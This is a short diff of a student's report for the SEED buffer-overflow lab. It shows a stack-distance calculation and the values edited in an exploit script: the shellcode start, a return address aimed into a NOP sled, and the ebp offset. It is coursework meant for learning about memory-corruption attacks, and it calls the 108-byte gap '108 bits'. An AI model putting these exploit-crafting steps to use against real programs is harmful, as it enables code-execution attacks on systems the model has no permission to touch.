jbg469/Buffer-Overflow-Seed-Lab/Part2/Reports/Artifacts/jbg469-AppSec-Lab1-Part1.md

 >>> hex(0xffffcb28-0xffffcabc)
 '0x6c' or 108 bits apart in the stack.
 ```
+In the exploit-32.py file we edit the following values

 ```
-In the exploit file we edit the following values start = 517-len(shellcode)   # start from len(shellcode) from the end of array ret = 0xffffcabc + 250       # return beyond ebp / NOP sled
+start = 517-len(shellcode)   # start from len(shellcode) from the end of array
+ret = 0xffffcabc + 250       # return beyond ebp / NOP sled
 offset = 108 + 4             #ebp-&buffer+4